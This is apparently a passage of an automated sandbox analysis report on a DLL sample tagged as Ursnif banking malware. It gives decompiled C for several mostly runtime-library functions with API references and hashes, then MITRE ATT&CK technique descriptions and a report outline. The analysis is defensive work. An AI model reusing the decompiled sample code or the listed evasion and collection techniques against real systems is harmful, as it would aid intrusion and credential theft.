								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

APIs

GetLastError.KERNEL32(?,?,?,6EDAA825,00000000,00000001,6EDA8C35,?,6EDAACE2,00000001,?,?,?,6EDA8BCE,?,00000000), ref: 6EDA6548
_free.LIBCMT ref: 6EDA65A5
_free.LIBCMT ref: 6EDA65DB
SetLastError.KERNEL32(00000000,00000007,000000FF,?,6EDAACE2,00000001,?,?,?,6EDA8BCE,?,00000000,00000000,6EDC1660,0000002C,6EDA8C35), ref: 6EDA65E6

Memory Dump Source

Source File: 00000002.00000002.1208455743.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000002.00000002.1208429273.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208473024.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208533213.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1208565492.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 6baa6e5c02fad219a85f436dff74abdc84463ef92fbdee5eeb70363e9e9636bd
Instruction ID: 4aefb18991a33917542a5b30e04222c10c654ecabff9dcbd3f23774b89cd6a76
Opcode Fuzzy Hash: 6baa6e5c02fad219a85f436dff74abdc84463ef92fbdee5eeb70363e9e9636bd
Instruction Fuzzy Hash: 1211A776624601EEAA416BFDCC8CE9F365EDBC26A87140E24F735821C4EF61CB054174

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA669A, Relevance: 6.1, APIs: 4, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6EDA669A(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x6edc3050; // 0x7
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6EDA84C0(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E6EDA6AE6(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E6EDA84C0(__eflags,  *0x6edc3050, _t18);
							if(__eflags != 0) {
								E6EDA6341(_t18, 0x6edc424c);
								E6EDA6B43(0);
								goto L13;
							} else {
								_t13 = 0;
								E6EDA84C0(__eflags,  *0x6edc3050, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E6EDA84C0(0,  *0x6edc3050, 0);
							_push(0);
							L9:
							E6EDA6B43();
							goto L4;
						}
					}
				} else {
					_t18 = E6EDA8481(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x6edc3050; // 0x7
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

APIs

GetLastError.KERNEL32(?,?,00000001,6EDA6AD8,6EDA6B69,?,?,6EDA5D93), ref: 6EDA669F
_free.LIBCMT ref: 6EDA66FC
_free.LIBCMT ref: 6EDA6732
SetLastError.KERNEL32(00000000,00000007,000000FF,?,00000001,6EDA6AD8,6EDA6B69,?,?,6EDA5D93), ref: 6EDA673D

Memory Dump Source

Source File: 00000002.00000002.1208455743.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000002.00000002.1208429273.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208473024.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208533213.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1208565492.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: e40f3bd8a4bdd0d282b8d0d878f418ba6e581e12f8f96522fe967bdabebc00df
Instruction ID: 833263f50fc2e4828cacc74a63f02488369f5261f5cd6a78bca39d7cad5483e2
Opcode Fuzzy Hash: e40f3bd8a4bdd0d282b8d0d878f418ba6e581e12f8f96522fe967bdabebc00df
Instruction Fuzzy Hash: 5511C672634A01EEA7411BFDCC8CEAF365E9BC27B87280668F735831D0DE61CA065174

Uniqueness

Uniqueness Score: -1.00%

Function 6EDABA26, Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EDABA26(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x6edc3850, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E6EDABA0F();
					E6EDAB9D1();
					_t13 = WriteConsoleW( *0x6edc3850, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x6edaba43
0x6edaba47
0x6edaba54
0x6edaba59
0x6edaba74
0x6edaba74
0x6edaba7a

APIs

WriteConsoleW.KERNEL32(?,?,6EDA8C35,00000000,?,?,6EDAB485,?,00000001,?,00000001,?,6EDAA7B2,00000000,00000000,00000001), ref: 6EDABA3D
GetLastError.KERNEL32(?,6EDAB485,?,00000001,?,00000001,?,6EDAA7B2,00000000,00000000,00000001,00000000,00000001,?,6EDAAD06,6EDA8BCE), ref: 6EDABA49

Part of subcall function 6EDABA0F: CloseHandle.KERNEL32(FFFFFFFE,6EDABA59,?,6EDAB485,?,00000001,?,00000001,?,6EDAA7B2,00000000,00000000,00000001,00000000,00000001), ref: 6EDABA1F

___initconout.LIBCMT ref: 6EDABA59

Part of subcall function 6EDAB9D1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6EDABA00,6EDAB472,00000001,?,6EDAA7B2,00000000,00000000,00000001,00000000), ref: 6EDAB9E4

WriteConsoleW.KERNEL32(?,?,6EDA8C35,00000000,?,6EDAB485,?,00000001,?,00000001,?,6EDAA7B2,00000000,00000000,00000001,00000000), ref: 6EDABA6E

Memory Dump Source

Source File: 00000002.00000002.1208455743.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000002.00000002.1208429273.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208473024.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208533213.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1208565492.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 7901ba083263374625edebde68f32c10e3250f94204679bcd7377e65e5804c91
Instruction ID: 50f7a7225fd23d91bec8675473d4926d6c272723abb53727a680cbcd0fae8e65
Opcode Fuzzy Hash: 7901ba083263374625edebde68f32c10e3250f94204679bcd7377e65e5804c91
Instruction Fuzzy Hash: 7FF0F836404619BBEF121FD9CC0CA8E3F6AFB097A0B004410FA5995164C7328AA2DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA5E91, Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EDA5E91() {

				E6EDA6B43( *0x6edc4258);
				 *0x6edc4258 = 0;
				E6EDA6B43( *0x6edc425c);
				 *0x6edc425c = 0;
				E6EDA6B43( *0x6edc3f3c);
				 *0x6edc3f3c = 0;
				E6EDA6B43( *0x6edc3f40);
				 *0x6edc3f40 = 0;
				return 1;
			}

0x6eda5e9a
0x6eda5ea7
0x6eda5ead
0x6eda5eb8
0x6eda5ebe
0x6eda5ec9
0x6eda5ecf
0x6eda5ed7
0x6eda5ee0

APIs

_free.LIBCMT ref: 6EDA5E9A

Part of subcall function 6EDA6B43: HeapFree.KERNEL32(00000000,00000000,?,6EDA5D93), ref: 6EDA6B59
Part of subcall function 6EDA6B43: GetLastError.KERNEL32(?,?,6EDA5D93), ref: 6EDA6B6B

_free.LIBCMT ref: 6EDA5EAD
_free.LIBCMT ref: 6EDA5EBE
_free.LIBCMT ref: 6EDA5ECF

Memory Dump Source

Source File: 00000002.00000002.1208455743.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000002.00000002.1208429273.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208473024.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208533213.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1208565492.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 4fabb3e37597672dac55bd08c6312340b0bd10d410a1d019d530a35d259aff14
Instruction ID: 084af87c8ceacb8adee5856a357d5877f54a3b6fde1557ba607a973290d125ee
Opcode Fuzzy Hash: 4fabb3e37597672dac55bd08c6312340b0bd10d410a1d019d530a35d259aff14
Instruction Fuzzy Hash: D5E04F70430962DAAE017F5ED40D88DFB3DE78AF883050886E42002210D73143139F90

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA5790, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E6EDA5790(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						E6EDA7A6E(_t48);
						E6EDA74BB(_t48, _t57, 0, 0x6edc3c98, 0, 0x6edc3c98, 0x104);
						_t26 =  *0x6edc3f44; // 0x2e43368
						 *0x6edc3f34 = 0x6edc3c98;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x6edc3c98;
							_v20 = 0x6edc3c98;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = L6EDA5A41(E6EDA58C8( &_v8, _t26, 0, 0,  &_v8,  &_v16), _t48, _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E6EDA58C8( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E6EDA73AE(_t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0x6edc3f38 = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x6edc3f3c = _t58;
											L18:
											E6EDA6B43(_t37);
											_v12 = 0;
											L19:
											E6EDA6B43(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x6edc3f38 = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x6edc3f3c = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E6EDA6AD3(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E6EDA6AD3(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E6EDA6A16();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

Strings

C:\Windows\SysWOW64\regsvr32.exe, xrefs: 6EDA57D3, 6EDA57DA, 6EDA5810

Memory Dump Source

Source File: 00000002.00000002.1208455743.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000002.00000002.1208429273.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208473024.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1208533213.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1208565492.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\SysWOW64\regsvr32.exe
API String ID: 0-3922119987
Opcode ID: c4768271b4096b75a9efd88111106e7d49406477cf65ca6126c61806d7971ac8
Instruction ID: 60ebd097e28db48506b89f622d5bb3145556e076daab8efab9f9e4be62b0eb3f
Opcode Fuzzy Hash: c4768271b4096b75a9efd88111106e7d49406477cf65ca6126c61806d7971ac8
Instruction Fuzzy Hash: 9E41A271E50615FFDB51DFEDD88499EBBBCEB8A710B1004A6E614AB240D7708B41CBA0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 2W6FcgEeMy.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Function 6EDA23D0, Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 289
fileCOMMON

Function 6EDA38BB, Relevance: 10.6, APIs: 7, Instructions: 136
COMMON

Function 6EDA396B, Relevance: 7.6, APIs: 5, Instructions: 87
COMMON

Function 6EDA5AEE, Relevance: 4.6, APIs: 3, Instructions: 103
COMMON

Function 6EDA37B4, Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Function 6EDA80D4, Relevance: 3.1, APIs: 2, Instructions: 67
COMMON

Function 6EDA5A9C, Relevance: 3.0, APIs: 2, Instructions: 31
COMMON

Function 6EDA6AE6, Relevance: 1.3, APIs: 1, Instructions: 39
memoryCOMMON

Function 6EDA1000, Relevance: 44.9, Strings: 35, Instructions: 1114
COMMONCrypto

Function 6EDA3F9D, Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Function 6EDA6868, Relevance: 4.6, APIs: 3, Instructions: 78
COMMON

Function 6EDA567B, Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Function 6EDA3010, Relevance: 4.0, Strings: 3, Instructions: 211
COMMONCrypto

Function 6EDACE83, Relevance: 1.8, APIs: 1, Instructions: 274
COMMONCrypto

Function 6EDA4187, Relevance: 1.6, APIs: 1, Instructions: 144
COMMON

Function 6EDA6F26, Relevance: 1.6, APIs: 1, Instructions: 140
COMMON

Function 6EDA2ED0, Relevance: 1.4, Strings: 1, Instructions: 117
COMMON

Function 6EDA863C, Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Function 6EDA6835, Relevance: .0, Instructions: 23
COMMON

Function 6EDA91F7, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Function 6EDA63FD, Relevance: 15.1, APIs: 10, Instructions: 70
COMMON

Function 6EDA43B0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Function 6EDA8258, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78
COMMON

Function 6EDAB2C8, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Function 6EDAA3DB, Relevance: 9.3, APIs: 6, Instructions: 319
fileCOMMON

Function 6EDA49E7, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON